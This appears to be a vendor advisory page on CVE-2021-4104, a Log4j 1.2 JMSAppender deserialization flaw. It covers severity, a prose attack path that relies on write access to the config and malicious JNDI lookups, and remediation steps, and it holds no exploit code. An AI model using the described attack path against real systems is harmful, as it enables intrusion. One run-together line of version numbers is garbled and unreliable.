External risk intelligence

Log4j 1.2 configuration flaw could allow an attacker to take control of your systems.

CVE advisorySeverity: HIGH (CVSS 7.5)

CVE-2021-4104

A Log4j 1.2 configuration flaw could allow remote code execution if an attacker can modify the application's logs, similar to CVE-2021-44228. This affects older, unsupported Log4j versions with specific JMSAppender configurations.

3Halo Surface Signal

Deserialization

Apache Log4j

1.23512.06.0.077.0.07.06.03.04.64.74.88.012.112.25.9.0.0.012.2.1.3.012.2.1.4.04.58.17.3.6before 12.0.0.4.012.0.0.5.07.3.47.3.57.4.17.4.22.2.1.1...

External exposure likelihood

Halo Surface Signal score for CVE-2021-4104

The vulnerability requires specific, non-default configuration of the JMSAppender component within Log4j 1.2. While Log4j is common in web-facing applications, the requirement for this non-standard, specific configuration and attacker write access to the configuration file makes widespread, easy, or intended public internet reachability less certain than a default-exposed service.

Horizon Alert

Summary of the vulnerability and why it matters

This vulnerability in older versions of Apache Log4j allows an attacker to execute code remotely if they can write to the application's configuration. This is possible when a specific, non-default component called JMSAppender is used, which then makes malicious calls when processing configuration settings. Teams should pay attention because this could lead to a complete compromise of affected systems.

Can lead to remote code execution.
Requires specific, non-default configuration.
Affects older Log4j 1.2 versions.

Attack Path

How an attacker could exploit the issue

An attacker can exploit this by gaining write access to the Log4j configuration file. They would then modify the `JMSAppender` to include malicious JNDI lookups, leading to remote code execution when the application processes logs. This relies on a specific, non-default configuration.

Attacker needs config write access.
Targets `JMSAppender` configuration.
Requires specific, non-default setup.

Live Threat

Current exploitation, exposure, and threat context

Attackers might target this vulnerability due to its potential for remote code execution, similar to the widespread Log4Shell. However, exploitation is less straightforward as it requires a specific, non-default configuration of Log4j 1.2's JMSAppender and the attacker to have write access to the configuration. This significantly limits the attack surface compared to more easily accessible vulnerabilities.

Requires specific configuration.
Attacker needs write access.
Log4j 1.2 is end-of-life.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

Prioritize identifying and isolating systems using Log4j 1.2 with a JMSAppender configuration. Review logs for signs of exploitation attempts targeting this specific vulnerability, as it allows for remote code execution via deserialization. Due to the potential for high impact, take affected services offline if they are critical and cannot be immediately patched or mitigated.

Block or rate-limit outbound JNDI lookups.
Remove or disable the JMSAppender configuration.
Upgrade to Log4j 2 or a newer, supported logging library.

Frequently asked questions

What is Apache Log4j 1.2 and what was it used for?

Apache Log4j 1.2 is an older logging framework for Java applications. Developers used it to record events, errors, and other information generated by their software, helping with debugging and monitoring. This version reached its end of life in August 2015.

What kind of vulnerability does CVE-2021-4104 represent?

CVE-2021-4104 is a deserialization vulnerability. This means that when Log4j 1.2 is configured in a specific way using its JMSAppender, it can process untrusted data in a manner that allows an attacker to execute arbitrary code on the affected system.

How can an attacker exploit the Log4j 1.2 vulnerability?

An attacker needs to be able to write to the Log4j configuration file. By manipulating specific configuration settings related to JMSAppender, they can trick the application into making network requests that lead to code execution. Using Log4j 1.2 without this specific JMSAppender configuration does not trigger the bug.

Who should be concerned about CVE-2021-4104?

Organizations using Log4j 1.2 with the JMSAppender configuration should be concerned. While the vulnerability is classified as external due to its network attack vector, its exploitation requires specific conditions (non-default configuration and write access to config), making it a 'Possible' risk according to the Halo Surface Signal.

What is the first step to address this Log4j 1.2 vulnerability?

The immediate first step is to identify all systems that are running Log4j 1.2 and are specifically configured to use the JMSAppender. If possible, isolate these systems. It is strongly recommended to upgrade to Log4j 2, which addresses this and other security issues.

References

Written by Nicholas Merritt

External-surface CVE analysis and Halo Surface Signal prioritization for Halo Threat Intelligence.